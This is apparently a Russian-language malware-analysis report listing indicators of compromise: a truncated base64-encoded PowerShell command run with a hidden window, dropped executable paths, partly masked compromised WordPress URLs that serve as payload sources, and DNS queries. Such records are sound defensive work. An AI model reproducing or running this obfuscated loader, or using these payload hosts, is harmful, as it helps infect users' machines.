Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -encod JABWAHoAYQBmADEAeQB3AD0AKAAnAFQAJwArACgAJwA4ACcAKwAnAHgAMgAnACkAKwAoACcANAAnACsAJwByADgAJwApACkAOwAmACgAJwBuAGUAdwAtACcAKwAnAGkAdAAnACsAJwBlAG0AJwApACAAJABlAG4AdgA6AFUAUwBFAHIAUABSAG8ARg...
- %HOMEPATH%\tacv5dw\el08ge7\h6kue44w3.exe
- %HOMEPATH%\tacv5dw\el08ge7\h6kue44w3.exe
- 'mi###illie.com':443
- http://lo#####favoritos.com/wp-admin/c/
- http://lo#####favoritos.com/cgi-sys/suspendedpage.cgi
- http://ge####lstorebd.com/wp-admin/pvI/
- http://la###########dmodernwrestlingandyogacentre.com/wp-content/kg/
- http://oc####sconsults.com/wp-content/En7/
- DNS ASK lo#####favoritos.com
- DNS ASK ge####lstorebd.com
- DNS ASK ag#####despecialist.com
- DNS ASK la###########dmodernwrestlingandyogacentre.com
- DNS ASK zz####.xuezha.vip
- DNS ASK oc####sconsults.com
- DNS ASK mi###illie.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -encod JABWAHoAYQBmADEAeQB3AD0AKAAnAFQAJwArACgAJwA4ACcAKwAnAHgAMgAnACkAKwAoACcANAAnACsAJwByADgAJwApACkAOwAmACgAJwBuAGUAdwAtACcAKwAnAGkAdAAnACsAJwBlAG0AJwApACAAJABlAG4AdgA6AFUAUwBFAHIAUABSAG8ARg...' (со скрытым окном)